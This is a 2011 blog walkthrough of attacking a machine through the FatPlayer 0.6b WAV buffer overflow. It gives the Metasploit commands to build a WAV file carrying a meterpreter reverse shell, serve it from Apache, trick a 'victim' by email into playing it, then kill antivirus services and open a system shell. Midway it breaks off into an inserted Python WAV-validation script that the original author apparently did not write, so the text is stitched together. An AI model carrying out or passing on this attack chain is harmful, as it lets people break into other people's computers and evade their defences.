Friday 15 July 2011

Metasploit vs FatPlayer


View the video online: http://blip.tv/jac0bn3t/metasploit-fatplayer-buffer-overview-5376533
Download the video: http://blip.tv/file/get/Jac0bn3t-metasploitFatplayerBufferOverview350.mp4

What I used:

Metasploit
OS: BackTrack 5 and Windows XP SP3
FatPlayer
Camtasia Recorder
Mozilla Firefox

Hacking steps:

*I looked for a vulnerable music player and found that FatPlayer version 0.6b is vulnerable to a buffer overflow in its WAV file handling, so I created the backdoor as a WAV file.

*Start msfconsole.

*The exploit is: windows/fileformat/fatplayer_wav

*The commands to create the backdoor are:
   *set FILENAME yourfilename.wav (I named it playme.wav)
   *set OUTPUTPATH /root (the output directory)
   *set PAYLOAD windows/meterpreter/reverse_tcp
   *set LHOST your IP address (find it with ifconfig)
   *set LPORT any port you want to listen on (for me it is 8080)
   *exploit, which creates the backdoor in WAV file format

*Download the vulnerable FatPlayer 0.6.

*Rename your fatplayer_win32.exe and backdoor.wav to any names you choose (for me: "fatplayer_win32.exe ======> fatplayer.exe" and "backdoor.wav =======> playme.wav").

*Start the apache2 server (all commands can be found at the end of the post).

*Place your fatplayer_win.exe and backdoor.wav in "/var/www" so they are easy to share with your victim.

*Social-engineer your victim by sending an email with your mail client (for me it is ssmtp) containing the IP address of your Apache server (your IP address can be found with ifconfig), like this: yourip/backdoor.wav and yourip/fatplayer.exe

*Listen on the port the backdoor was created with (for me it is 8080):
   *use exploit/multi/handler
   *set LPORT the port you used when creating the payload (for me it is 8080)
   *set LHOST your IP address (find it with ifconfig)
   *exploit (wait for the victim to play the music)

*After the victim plays the music you get an open meterpreter session.

*Run some interesting scripts in meterpreter:
   *run checkvm: to find out whether the system is a virtual machine
   *run killav: to kill antivirus services
   *shell -i: to get the system shell
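The defender's counterpart to the WAV vector above, added here as an example (this is not code from the original post or from the Metasploit module): a structural check that rejects a RIFF/WAVE file whose chunk sizes overrun the file or whose 'fmt ' chunk is implausible, before a naive player's parser trusts those header values. Which field the real FatPlayer 0.6b bug trips on is not stated in the post, so the checks are generic; make_wav builds a constructed test input.

```python
import struct

# Structural sanity checks for a RIFF/WAVE file, from the defender's side:
# flag chunk sizes that overrun the file, a 'fmt ' chunk of unexpected size,
# or implausible format fields. Constructed example; the specific field the
# FatPlayer 0.6b overflow depends on is an assumption, not taken from the post.

def check_wav(data: bytes) -> list:
    """Return a list of findings; an empty list means the file looks well-formed."""
    findings = []
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return ["not a RIFF/WAVE file"]
    riff_size = struct.unpack_from("<I", data, 4)[0]
    if riff_size + 8 != len(data):
        findings.append(f"RIFF size {riff_size} does not match file length {len(data) - 8}")
    pos, seen_fmt = 12, False
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        if not all(0x20 <= b < 0x7F for b in cid):
            findings.append(f"non-printable chunk id {cid!r} at offset {pos}")
        if pos + 8 + size > len(data):
            findings.append(f"chunk {cid!r} declares {size} bytes but only {len(data) - pos - 8} remain")
            break  # nothing after this point can be trusted
        if cid == b"fmt ":
            seen_fmt = True
            if size not in (16, 18, 40):  # PCM, PCM + cbSize, WAVE_FORMAT_EXTENSIBLE
                findings.append(f"'fmt ' chunk size {size} is not 16/18/40")
            else:
                channels, rate = struct.unpack_from("<HI", data, pos + 10)
                if channels == 0 or channels > 8 or rate == 0:
                    findings.append(f"implausible fmt values: channels={channels} rate={rate}")
        pos += 8 + size + (size & 1)  # chunks are word-aligned
    if not seen_fmt:
        findings.append("no 'fmt ' chunk")
    return findings

def make_wav(fmt_size: int = 16, declared_data_size=None, samples: bytes = b"\x80" * 4) -> bytes:
    """Build a minimal 8 kHz mono 8-bit PCM WAV (constructed test input).
    declared_data_size lets the 'data' chunk lie about its length."""
    fmt_body = (struct.pack("<HHIIHH", 1, 1, 8000, 8000, 1, 8) + b"\x00" * 24)[:fmt_size]
    fmt_chunk = b"fmt " + struct.pack("<I", fmt_size) + fmt_body
    declared = len(samples) if declared_data_size is None else declared_data_size
    data_chunk = b"data" + struct.pack("<I", declared) + samples
    body = b"WAVE" + fmt_chunk + data_chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body
```

check_wav(make_wav()) returns an empty list, while check_wav(make_wav(declared_data_size=0x10000)) reports the 'data' chunk overrunning the file.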

THE COMMANDS ARE:
cp: to copy a file, e.g. cp /root/mydata.txt /etc/init.d/mydata.txt
mv: to rename a file, e.g. mv mydata.txt data.txt
service apache2 start: to start Apache


Music: by Savage Garden
   *Santa Monica
   *Animal Song
